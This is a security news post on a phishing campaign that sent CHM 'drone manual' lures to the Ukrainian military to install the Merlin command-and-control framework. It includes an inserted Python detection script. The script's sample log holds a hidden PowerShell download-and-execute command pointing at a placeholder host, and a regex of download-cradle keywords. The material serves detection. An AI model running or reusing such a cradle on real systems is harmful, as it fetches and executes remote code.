
September 25, 2023

Ukrainian military targeted with drone manual themed phishing emails


Security researchers have uncovered a new phishing campaign against the Ukrainian military that leverages Microsoft Compiled HTML Help (CHM) files designed to look like an operating manual for drones. Once opened, the CHM file runs embedded JavaScript and then PowerShell to ultimately download Merlin, an open-source, Go-based post-exploitation command-and-control framework that gives the operator remote code execution on the infected host.
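To make the chain described above detectable, here is an added example (written for this page, not code from the article, Field Effect, or the cited reporting) that flags Sysmon-style process-creation events consistent with a weaponised CHM: the Windows HTML Help viewer (hh.exe) opening a .chm from a download location and then spawning a script host, optionally with a PowerShell download cradle on its command line. The one-line key=value log format, the field names, the directory list and the sample events are assumptions constructed for the example; the detection rests on the general observation that a legitimately viewed help file has no reason to launch cmd.exe or powershell.exe.

```python
"""Flag process-creation events consistent with a malicious CHM launch.

Added example, not from the article or the reporting it cites. It assumes
Sysmon-style Event ID 1 fields flattened to one line per event as
key=value pairs separated by '|'. The sample lines below are constructed
for illustration, not captured from the campaign.
"""
import re
from pathlib import PureWindowsPath

# Script hosts a CHM-embedded script would plausibly hand off to (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
HELP_VIEWER = "hh.exe"   # Windows HTML Help viewer, the registered handler for .chm
# Directories where a mailed attachment typically lands (assumption).
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\", "\\outlook\\")
# Common PowerShell download-cradle fragments (case-insensitive).
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"net\.webclient|start-bitstransfer|-enc(odedcommand)?\b", re.I)


def parse_event(line):
    """'Image=C:\\..|ParentImage=..|CommandLine=..' -> dict with lower-cased keys."""
    fields = {}
    for part in line.rstrip("\n").split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def basename(path):
    """Lower-cased file name of a Windows path; empty string if missing."""
    return PureWindowsPath(path).name.lower() if path else ""


def classify(event):
    """Return the list of rule names the event trips (empty if benign)."""
    hits = []
    image = basename(event.get("image"))
    parent = basename(event.get("parentimage"))
    cmdline = event.get("commandline", "")
    low = cmdline.lower()

    # Rule 1: the help viewer spawned a script host. Reading a CHM never
    # needs a child interpreter, so this is the highest-signal event.
    if parent == HELP_VIEWER and image in SCRIPT_HOSTS:
        hits.append("chm_spawned_script_host")

    # Rule 2: hh.exe opened a .chm from a location where mail attachments land.
    if image == HELP_VIEWER and ".chm" in low and any(d in low for d in USER_WRITABLE):
        hits.append("chm_opened_from_user_dir")

    # Rule 3: a script host launched from hh.exe carrying a download cradle,
    # i.e. the stage that would fetch the post-exploitation agent.
    if parent == HELP_VIEWER and image in SCRIPT_HOSTS and CRADLE.search(cmdline):
        hits.append("chm_download_cradle")
    return hits


def scan(lines):
    """Return [(line_no, rules)] for every line that trips at least one rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        rules = classify(parse_event(line))
        if rules:
            findings.append((n, rules))
    return findings


# Constructed sample events: a benign vendor help file, then a suspicious chain.
SAMPLE_LOG = [
    r"Image=C:\Windows\hh.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=C:\Windows\hh.exe C:\Program Files\Vendor\help.chm",
    r"Image=C:\Windows\hh.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=C:\Windows\hh.exe C:\Users\op\Downloads\drone_manual.chm",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\hh.exe"
    r"|CommandLine=powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient)"
    r".DownloadString('http://example.invalid/m.ps1')",
    r"Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=notepad C:\Users\op\Documents\notes.txt",
]

if __name__ == "__main__":
    for n, rules in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(rules)}")
```

Rule 1 fires on its own so that an operator who renames the cradle or stages it from a second file still gets an alert; rule 3 only adds severity. If the help viewer is genuinely used in the environment, tune rule 2 by directory rather than loosening rule 1, and feed the flagged hh.exe process IDs back into a parent-child search to recover the full chain.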

In August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) advised that it had observed a similar attack in which CHM files served as the decoy used to deliver the same open-source framework.

In that earlier campaign, the threat actor sent the phishing emails from an address crafted to look as though it belonged to CERT-UA and used the subject line “CERT-UA recommendations on MS Office program settings.” CERT-UA attributed the activity to a group it tracks as UAC-0154.

Source: The Hacker News

Analysis

It’s unclear if the use of drone manual lures is intended specifically to target Ukrainian military personnel engaged in drone warfare, or if the threat actor simply assumed drone manuals would be interesting enough to elicit a response from the recipient regardless of what unit they are in.

Ukraine has been extremely effective in using drones to target Russian equipment and personnel. It is therefore highly likely that the cyber units of Russia’s Main Intelligence Directorate (GRU) are strongly motivated to obtain sensitive information on Ukraine’s drone program and its operators.

Mitigation

Field Effect recommends that governments and organizations in Ukraine, and those supporting Ukraine, adopt a heightened cybersecurity posture given the threat posed by Russian state-sponsored cyber actors. We encourage all organizations to review the U.S. Cybersecurity & Infrastructure Security Agency (CISA) Shields Up program, which provides robust guidance on preparing for, responding to, and mitigating the impacts of Russian state-sponsored cyberattacks.

Field Effect’s elite team of Security Intelligence professionals constantly monitors the cyber threat landscape for novel TTPs and IoCs. This research contributes to the timely deployment of signatures into Covalence to detect and mitigate threat activity.
